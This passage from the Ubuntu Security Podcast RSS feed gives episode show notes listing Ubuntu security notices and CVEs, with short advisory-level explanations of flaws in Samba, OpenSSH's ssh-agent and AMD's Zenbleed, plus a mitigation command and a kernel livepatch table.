<li><a href="https://ubuntu.com/security/CVE-2023-22046">CVE-2023-22046</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22038">CVE-2023-22038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22033">CVE-2023-22033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22008">CVE-2023-22008</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-22005">CVE-2023-22005</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6289-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6289-1">USN-6289-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>9 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38611">CVE-2023-38611</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38600">CVE-2023-38600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38599">CVE-2023-38599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38597">CVE-2023-38597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38595">CVE-2023-38595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38594">CVE-2023-38594</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38592">CVE-2023-38592</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38572">CVE-2023-38572</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38133">CVE-2023-38133</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6290-1-libtiff-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6290-1">USN-6290-1</a>] LibTIFF vulnerabilities</h3>
<ul>
<li>10 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38289">CVE-2023-38289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-38288">CVE-2023-38288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26965">CVE-2023-26965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-26966">CVE-2023-26966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-25433">CVE-2023-25433</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3618">CVE-2023-3618</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3316">CVE-2023-3316</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2908">CVE-2023-2908</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2731">CVE-2023-2731</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-48281">CVE-2022-48281</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6291-1-gstreamer-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6291-1">USN-6291-1</a>] GStreamer vulnerability</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-5838">CVE-2017-5838</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6292-1-ceph-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6292-1">USN-6292-1</a>] Ceph vulnerability</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-3650">CVE-2022-3650</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6293-1-openstack-heat-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6293-1">USN-6293-1</a>] OpenStack Heat vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1625">CVE-2023-1625</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-22-dot-04-dot-3-lts-released--15-47">Ubuntu 22.04.3 LTS Released (15:47)</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2023-August/000294.html">https://lists.ubuntu.com/archives/ubuntu-announce/2023-August/000294.html</a></li>
</ul>
<h3 id="ubuntu-22-dot-10--kinetic-kudu--end-of-life--16-32">Ubuntu 22.10 (Kinetic Kudu) End of Life (16:32)</h3>
<ul>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-announce/2023-July/000293.html">https://lists.ubuntu.com/archives/ubuntu-announce/2023-July/000293.html</a></li>
</ul>
<h3 id="unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu--17-00">Unprivileged user namespace restrictions via AppArmor in Ubuntu (17:00)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626">https://discourse.ubuntu.com/t/spec-unprivileged-user-namespace-restrictions-via-apparmor-in-ubuntu-23-10/37626</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E205.mp3" length="33708002" type="audio/mpeg" /><itunes:duration>1214</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 204
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-204/</link>
          <pubDate>Fri, 04 Aug 2023 18:38:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>49daf7bf66159caff989814064454ab948818808f5ea43d4a6851078484ba408fad3b3a943f789669a512eb88cd56f16c3666fd06c172d3ddb84d29a85a6a25e</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 204</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at the recent Zenbleed vulnerability affecting some AMD
  processors, plus we cover security updates for the Linux kernel, a high
  profile OpenSSH vulnerability and finally Andrei is back with a deep dive into
  recent...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at the recent Zenbleed vulnerability affecting some AMD
  processors, plus we cover security updates for the Linux kernel, a high
  profile OpenSSH vulnerability and finally Andrei is back with a deep dive into
  recent academic research around how to safeguard machine learning systems when
  used across distributed deployments.
  </itunes:summary>
        <description>  This week we look at the recent Zenbleed vulnerability affecting some AMD
  processors, plus we cover security updates for the Linux kernel, a high
  profile OpenSSH vulnerability and finally Andrei is back with a deep dive into
  recent academic research around how to safeguard machine learning systems when
  used across distributed deployments.
  </description>
        <googleplay:description>  This week we look at the recent Zenbleed vulnerability affecting some AMD
  processors, plus we cover security updates for the Linux kernel, a high
  profile OpenSSH vulnerability and finally Andrei is back with a deep dive into
  recent academic research around how to safeguard machine learning systems when
  used across distributed deployments.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at the recent Zenbleed vulnerability affecting some AMD
processors, plus we cover security updates for the Linux kernel, a high
profile OpenSSH vulnerability and finally Andrei is back with a deep dive into
recent academic research around how to safeguard machine learning systems when
used across distributed deployments.</p>
<h2 id="this-fortnight-in-ubuntu-security-updates">This fortnight in Ubuntu Security Updates</h2>
<p>123 unique CVEs addressed</p>
<h3 id="usn-6238-1-samba-vulnerabilities-01-15">[<a href="https://ubuntu.com/security/notices/USN-6238-1">USN-6238-1</a>] Samba vulnerabilities [01:15]</h3>
<ul>
<li>5 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Kinetic (22.10), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34968">CVE-2023-34968</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34967">CVE-2023-34967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34966">CVE-2023-34966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3347">CVE-2023-3347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2127">CVE-2022-2127</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible attacker-in-the-middle attack when configured to do SMB2 packet
signing (as it was not properly enforced), couple issues in the Spotlight
protocol implementation (used to enable MacOS clients to search the Samba
share via Finder) - DoS via a possible infinite loop when processing RPC
packets which specified 0 elements in an array-like structure, plus info leak
where full server-side path of resources would be returned in results</li>
</ul>
<h3 id="usn-6237-2-curl-regression">[<a href="https://ubuntu.com/security/notices/USN-6237-2">USN-6237-2</a>] curl regression</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-32001">CVE-2023-32001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28322">CVE-2023-28322</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-28321">CVE-2023-28321</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6239-1-ecdsa-util-vulnerability-02-13">[<a href="https://ubuntu.com/security/notices/USN-6239-1">USN-6239-1</a>] ECDSA Util vulnerability [02:13]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-24884">CVE-2022-24884</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Very similar to &ldquo;Psychic Signatures&rdquo; vuln in Java (OpenJDK) -
<a href="/episode-172/#usn-5546-1-usn-5546-2-openjdk-vulnerabilities-03-09">[USN-5546-1, USN-5546-2] OpenJDK vulnerabilities
from Episode 172</a> - basically would fail to first check if the provided
exponents in the signature were zero - since if they are, then an all-zero
signature would be considered as valid - so could easily forge a signature</li>
</ul>
<h3 id="usn-6232-1-wkhtmltopdf-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6232-1">USN-6232-1</a>] wkhtmltopdf vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-21365">CVE-2020-21365</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6241-1-openstack-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6241-1">USN-6241-1</a>] OpenStack vulnerability</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2088">CVE-2023-2088</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6240-1-frr-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6240-1">USN-6240-1</a>] FRR vulnerability</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3748">CVE-2023-3748</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6242-1-usn-6242-2-openssh-vulnerability-03-08">[<a href="https://ubuntu.com/security/notices/USN-6242-1">USN-6242-1</a>, <a href="https://ubuntu.com/security/notices/USN-6242-2">USN-6242-2</a>] OpenSSH vulnerability [03:08]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-38408">CVE-2023-38408</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Result of an incomplete fix for historical vulnerability <a href="https://ubuntu.com/security/CVE-2016-10009">CVE-2016-10009</a> in
PKCS#11 module in ssh-agent</li>
<li>Vuln is hence very similar to that, ie. if you chose to forward the ssh-agent
socket to a remote machine, then the remote machine could cause your local
ssh-agent to execute arbitrary code - it does this by causing the PKCS#11
module in ssh-agent to load an attacker controlled library from <code>/usr/lib</code> on
your local machine
<ul>
<li>On the surface, it would appear that it would require a malicious library to
be on your machine in this privileged location - BUT there are a bunch of
seemingly innocuous libraries in say standard Ubuntu that can be abused to
cause malicious actions and get arbitrary code execution. This is exactly
what Qualys did to demonstrate the impact of this vuln -
<a href="https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt">https://www.qualys.com/2023/07/19/cve-2023-38408/rce-openssh-forwarded-ssh-agent.txt</a>
<ul>
<li>very clever use of various pieces of surprising behaviour from various
libraries (such as the ability to make the stack executable or register
signal handlers just by dlopen()&lsquo;ing a module) - chain these together to
then get code execution</li>
</ul>
</li>
<li>It does though require you to use ssh-agent forwarding - this is generally
discouraged, and instead you should probably use an jump host - this is even
mentioned in the man page for <code>ssh</code></li>
</ul>
</li>
<li>Fixed by making module loading more defensive (ie that they contain the
expected symbols and if not abort etc)</li>
</ul>
<h3 id="usn-6243-1-graphite-web-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6243-1">USN-6243-1</a>] Graphite-Web vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-4730">CVE-2022-4730</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4729">CVE-2022-4729</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4728">CVE-2022-4728</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18638">CVE-2017-18638</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6203-2-django-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6203-2">USN-6203-2</a>] Django vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-36053">CVE-2023-36053</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6129-2-avahi-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6129-2">USN-6129-2</a>] Avahi vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-1981">CVE-2023-1981</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6244-1-amd-microcode-vulnerability-05-57">[<a href="https://ubuntu.com/security/notices/USN-6244-1">USN-6244-1</a>] AMD Microcode vulnerability [05:57]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-20593">CVE-2023-20593</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Zenbleed - Tavis Ormandy (GPZ) discovered new hardware vuln via fuzzing of the
ISA - great writeup on his blog - <a href="https://lock.cmpxchg8b.com/zenbleed.html">https://lock.cmpxchg8b.com/zenbleed.html</a></li>
<li>Only specific to AMD&rsquo;s Zen2 family of processors and is related to speculative
execution - but unlike Spectre etc, speculative execution is not used as the
attack primitive - instead for Zenbleed, the processor fails to properly clean
up state after speculatively executing a particular vector register
instruction - which then allows an attacker thread / process to read this data
from the vector register - all comes about because these registers are not
like the normal physical registers in the CPU, but instead are shared as a
&ldquo;Register File&rdquo; - this sharing means that when one instruction gets
speculatively executed, but which turns out to not actually be needed, it
fails to properly clean up - and then leaks this data via the shared register
file which can be read by another process which is executing at the same time</li>
<li>Tavis also released a handy PoC - requires the use of specific assembly
language intructions and so it is not clear if this could be exploited
remotely say via JS running a web-browser - but it definitely can be exploited
by local users to spy on all other processes in the system (that use vector
registers), including root / VMs etc
<ul>
<li>What kinds of things use these vector registers? Turns out is is many, since
glibc implements functions like strlen() using them - and this is a very
common operation in all kinds of code</li>
</ul>
</li>
<li>So basically anyone with local unprivileged code-access on an affected system
could snoop on passwords etc</li>
<li>AMD released a microcode update to fix this - but only for server-oriented
EPYC line of processors (code named &ldquo;Rome&rdquo;) - so in that case all you need to
do is install this microcode update and reboot and you are good.</li>
<li>But that still leaves a lot of other platforms without an official fix -
according to their advisory they will release BIOS firmware updates for other
affected processors later in the year</li>
<li>You can however set a so-called &ldquo;chicken bit&rdquo; in the processor which (as far
as I can tell) instructs it to not execute this particular instruction
out-of-order (ie not speculatively execute it) - AMD haven&rsquo;t actually said
what this does but that is the assumption. As such, this does have an effect
on performance, although it is not clear how much.</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>wrmsr -a 0xc0011029 <span style="color:#66d9ef">$(($(</span>rdmsr -c 0xc0011029<span style="color:#66d9ef">)</span> <span style="color:#f92672">|</span> <span style="color:#f92672">(</span><span style="color:#ae81ff">1</span>&lt;&lt;<span style="color:#ae81ff">9</span><span style="color:#66d9ef">))</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><ul>
<li>Kernel developers have then developed a patch to automatically enable this
chicken-bit if the associated microcode update is not present - for Ubuntu we
plan to include this fix in the next round of kernel security updates, due on
21st August</li>
</ul>
<h3 id="lsn-0096-1-linux-kernel-vulnerability-11-47">[<a href="https://ubuntu.com/security/notices/LSN-0096-1">LSN-0096-1</a>] Linux kernel vulnerability [11:47]</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31436">CVE-2023-31436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-30456">CVE-2023-30456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-1380">CVE-2023-1380</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write in netfilter -&gt; crash / code-exec - plus a UAF in netfilter as
well - both require <code>CAP_NET_ADMIN</code> to exploit - but can get this in an
unprivileged user namespace -&gt; privesc</li>
<li>Plus a bunch of vulns covered in previous episodes
<ul>
<li>OOB read in the USB handling code for Broadcom FullMAC USB WiFi driver</li>
<li>KVM mishandling of control registers for nested guest VMs</li>
<li>OOB write in network queuing scheduler - also able to be triggered though an
unprivileged user namespace</li>
</ul>
</li>
</ul>
<table>
  <thead>
      <tr>
          <th>Kernel type</th>
          <th>22.04</th>
          <th>20.04</th>
          <th>18.04</th>
          <th>16.04</th>
          <th>14.04</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>aws</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>aws-hwe</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure</td>
          <td>96.3</td>
          <td>96.2</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>azure-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp</td>
          <td>96.3</td>
          <td>96.2</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.15</td>
          <td>—</td>
          <td>96.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gcp-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>96.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>96.2</td>
      </tr>
      <tr>
          <td>generic-5.15</td>
          <td>—</td>
          <td>96.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>generic-5.4</td>
          <td>—</td>
          <td>96.2</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke</td>
          <td>96.3</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.15</td>
          <td>—</td>
          <td>96.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gke-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>gkeop-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm</td>
          <td>96.3</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>ibm-5.4</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>linux</td>
          <td>96.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.15</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>96.2</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-4.4</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
          <td>96.2</td>
          <td>96.2</td>
      </tr>
      <tr>
          <td>lowlatency-5.15</td>
          <td>—</td>
          <td>96.3</td>
          <td>—</td>
          <td>—</td>
          <td>—</td>
      </tr>
      <tr>
          <td>lowlatency-5.4</td>
          <td>—</td>
          <td>96.2</td>
          <td>96.2</td>
          <td>—</td>
          <td>—</td>
      </tr>
  </tbody>
</table>
<h3 id="usn-6246-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6246-1">USN-6246-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3439">CVE-2023-3439</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3389">CVE-2023-3389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6247-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6247-1">USN-6247-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2860">CVE-2023-2860</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-3635">CVE-2022-3635</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-2663">CVE-2022-2663</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6248-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6248-1">USN-6248-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>7 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3389">CVE-2023-3389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32629">CVE-2023-32629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2640">CVE-2023-2640</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-21106">CVE-2023-21106</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-47929">CVE-2022-47929</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6249-1-linux-kernel--oem--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6249-1">USN-6249-1</a>] Linux kernel (OEM) vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-3389">CVE-2023-3389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3269">CVE-2023-3269</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6250-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6250-1">USN-6250-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3389">CVE-2023-3389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3269">CVE-2023-3269</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32629">CVE-2023-32629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-31248">CVE-2023-31248</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-2640">CVE-2023-2640</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6251-1-linux-kernel-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6251-1">USN-6251-1</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-35001">CVE-2023-35001</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3390">CVE-2023-3390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-32629">CVE-2023-32629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-3090">CVE-2023-3090</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
